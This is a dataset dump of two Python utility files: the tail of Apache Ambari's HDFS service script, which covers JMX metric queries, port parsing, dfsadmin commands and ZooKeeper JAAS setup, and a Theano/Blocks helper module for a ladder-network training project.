:param nn_address: Namenode Address, e.g., host:port, ** MAY ** be preceded with "http://" or "https://" already.
If not preceded, will use the encrypted param to determine.
:param modeler_type: Modeler type to query using startswith function
:param metric: Metric to return
:return: Return an object representation of the metric, or None if it does not exist
"""
if not nn_address or not modeler_type or not metric:
return None
nn_address = nn_address.strip()
if not nn_address.startswith("http"):
nn_address = ("https://" if encrypted else "http://") + nn_address
if not nn_address.endswith("/"):
nn_address = nn_address + "/"
nn_address = nn_address + "jmx"
Logger.info("Retrieve modeler: %s, metric: %s from JMX endpoint %s" % (modeler_type, metric, nn_address))
if security_enabled:
import params
data, error_msg, time_millis = curl_krb_request(params.tmp_dir, params.smoke_user_keytab, params.smokeuser_principal, nn_address,
"jn_upgrade", params.kinit_path_local, False, None, params.smoke_user)
else:
data = urllib2.urlopen(nn_address).read()
my_data = None
if data:
data_dict = json.loads(data)
if data_dict:
for el in data_dict['beans']:
if el is not None and el['modelerType'] is not None and el['modelerType'].startswith(modeler_type):
if metric in el:
my_data = el[metric]
if my_data:
my_data = json.loads(str(my_data))
break
return my_data
def get_port(address):
"""
Extracts port from the address like 0.0.0.0:1019
"""
if address is None:
return None
m = re.search(r'(?:http(?:s)?://)?([\w\d.]*):(\d{1,5})', address)
if m is not None and len(m.groups()) >= 2:
return int(m.group(2))
else:
return None
def is_secure_port(port):
"""
Returns True if port is root-owned at *nix systems
"""
if port is not None:
return port < 1024
else:
return False
def is_previous_fs_image():
"""
Return true if there's a previous folder in the HDFS namenode directories.
"""
import params
if params.dfs_name_dir:
nn_name_dirs = params.dfs_name_dir.split(',')
for nn_dir in nn_name_dirs:
prev_dir = os.path.join(nn_dir, "previous")
if os.path.isdir(prev_dir):
return True
return False
def get_hdfs_binary(distro_component_name):
"""
Get the hdfs binary to use depending on the stack and version.
:param distro_component_name: e.g., hadoop-hdfs-namenode, hadoop-hdfs-datanode
:return: The hdfs binary to use
"""
import params
hdfs_binary = "hdfs"
if params.stack_version_formatted and check_stack_feature(StackFeature.ROLLING_UPGRADE, params.stack_version_formatted):
hdfs_binary = "{0}/current/{1}/bin/hdfs".format(params.stack_root, distro_component_name)
return hdfs_binary
def get_dfsadmin_base_command(hdfs_binary, use_specific_namenode = False):
"""
Get the dfsadmin base command constructed using hdfs_binary path and passing namenode address as explicit -fs argument
:param hdfs_binary: path to hdfs binary to use
:param use_specific_namenode: flag if set and Namenode HA is enabled, then the dfsadmin command will use
current namenode's address
:return: the constructed dfsadmin base command
"""
import params
dfsadmin_base_command = ""
if params.dfs_ha_enabled and use_specific_namenode:
dfsadmin_base_command = format("{hdfs_binary} dfsadmin -fs hdfs://{params.namenode_rpc}")
else:
dfsadmin_base_command = format("{hdfs_binary} dfsadmin -fs {params.namenode_address}")
return dfsadmin_base_command
def set_up_zkfc_security(params):
""" Sets up security for accessing zookeper on secure clusters """
if params.stack_supports_zk_security is False:
Logger.info("Skipping setting up secure ZNode ACL for HFDS as it's supported only for HDP 2.6 and above.")
return
# check if the namenode is HA
if params.dfs_ha_enabled is False:
Logger.info("Skipping setting up secure ZNode ACL for HFDS as it's supported only for NameNode HA mode.")
return
# check if the cluster is secure (skip otherwise)
if params.security_enabled is False:
Logger.info("Skipping setting up secure ZNode ACL for HFDS as it's supported only for secure clusters.")
return
# process the JAAS template
File(os.path.join(params.hadoop_conf_secure_dir, 'hdfs_jaas.conf'),
owner=params.hdfs_user,
group=params.user_group,
mode=0644,
content=Template("hdfs_jaas.conf.j2")
)
|
alexryndin/ambari
|
ambari-server/src/main/resources/stacks/ADH/1.0/services/HDFS/package/scripts/utils.py
|
Python
|
apache-2.0
| 16,170
| 0.013296
|
import os
import logging
import numpy as np
import theano
from pandas import DataFrame, read_hdf
from blocks.extensions import Printing, SimpleExtension
from blocks.main_loop import MainLoop
from blocks.roles import add_role
logger = logging.getLogger('main.utils')
def shared_param(init, name, cast_float32, role, **kwargs):
if cast_float32:
v = np.float32(init)
p = theano.shared(v, name=name, **kwargs)
add_role(p, role)
return p
class AttributeDict(dict):
__getattr__ = dict.__getitem__
def __setattr__(self, a, b):
self.__setitem__(a, b)
class DummyLoop(MainLoop):
def __init__(self, extensions):
return super(DummyLoop, self).__init__(algorithm=None,
data_stream=None,
extensions=extensions)
def run(self):
for extension in self.extensions:
extension.main_loop = self
self._run_extensions('before_training')
self._run_extensions('after_training')
class ShortPrinting(Printing):
def __init__(self, to_print, use_log=True, **kwargs):
self.to_print = to_print
self.use_log = use_log
super(ShortPrinting, self).__init__(**kwargs)
def do(self, which_callback, *args):
log = self.main_loop.log
# Iteration
msg = "e {}, i {}:".format(
log.status['epochs_done'],
log.status['iterations_done'])
# Requested channels
items = []
for k, vars in self.to_print.iteritems():
for shortname, vars in vars.iteritems():
if vars is None:
continue
if type(vars) is not list:
vars = [vars]
s = ""
for var in vars:
try:
name = k + '_' + var.name
val = log.current_row[name]
except:
continue
try:
s += ' ' + ' '.join(["%.3g" % v for v in val])
except:
s += " %.3g" % val
if s != "":
items += [shortname + s]
msg = msg + ", ".join(items)
if self.use_log:
logger.info(msg)
else:
print msg
class SaveParams(SimpleExtension):
"""Finishes the training process when triggered."""
def __init__(self, trigger_var, params, save_path, **kwargs):
super(SaveParams, self).__init__(**kwargs)
if trigger_var is None:
self.var_name = None
else:
self.var_name = trigger_var[0] + '_' + trigger_var[1].name
self.save_path = save_path
self.params = params
self.to_save = {}
self.best_value = None
self.add_condition(['after_training'], self.save)
self.add_condition(['on_interrupt'], self.save)
def save(self, which_callback, *args):
if self.var_name is None:
self.to_save = {v.name: v.get_value() for v in self.params}
path = self.save_path + '/trained_params'
logger.info('Saving to %s' % path)
np.savez_compressed(path, **self.to_save)
def do(self, which_callback, *args):
if self.var_name is None:
return
val = self.main_loop.log.current_row[self.var_name]
if self.best_value is None or val < self.best_value:
self.best_value = val
self.to_save = {v.name: v.get_value() for v in self.params}
class SaveExpParams(SimpleExtension):
def __init__(self, experiment_params, dir, **kwargs):
super(SaveExpParams, self).__init__(**kwargs)
self.dir = dir
self.experiment_params = experiment_params
def do(self, which_callback, *args):
df = DataFrame.from_dict(self.experiment_params, orient='index')
df.to_hdf(os.path.join(self.dir, 'params'), 'params', mode='w',
complevel=5, complib='blosc')
class SaveLog(SimpleExtension):
def __init__(self, dir, show=None, **kwargs):
super(SaveLog, self).__init__(**kwargs)
self.dir = dir
self.show = show if show is not None else []
def do(self, which_callback, *args):
df = DataFrame.from_dict(self.main_loop.log, orient='index')
df.to_hdf(os.path.join(self.dir, 'log'), 'log', mode='w',
complevel=5, complib='blosc')
def prepare_dir(save_to, results_dir='results'):
base = os.path.join(results_dir, save_to)
i = 0
while True:
name = base + str(i)
try:
os.makedirs(name)
break
except:
i += 1
return name
def load_df(dirpath, filename, varname=None):
varname = filename if varname is None else varname
fn = os.path.join(dirpath, filename)
return read_hdf(fn, varname)
def filter_funcs_prefix(d, pfx):
pfx = 'cmd_'
fp = lambda x: x.find(pfx)
return {n[fp(n) + len(pfx):]: v for n, v in d.iteritems() if fp(n) >= 0}
|
arasmus/ladder
|
utils.py
|
Python
|
mit
| 5,079
| 0.000788
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.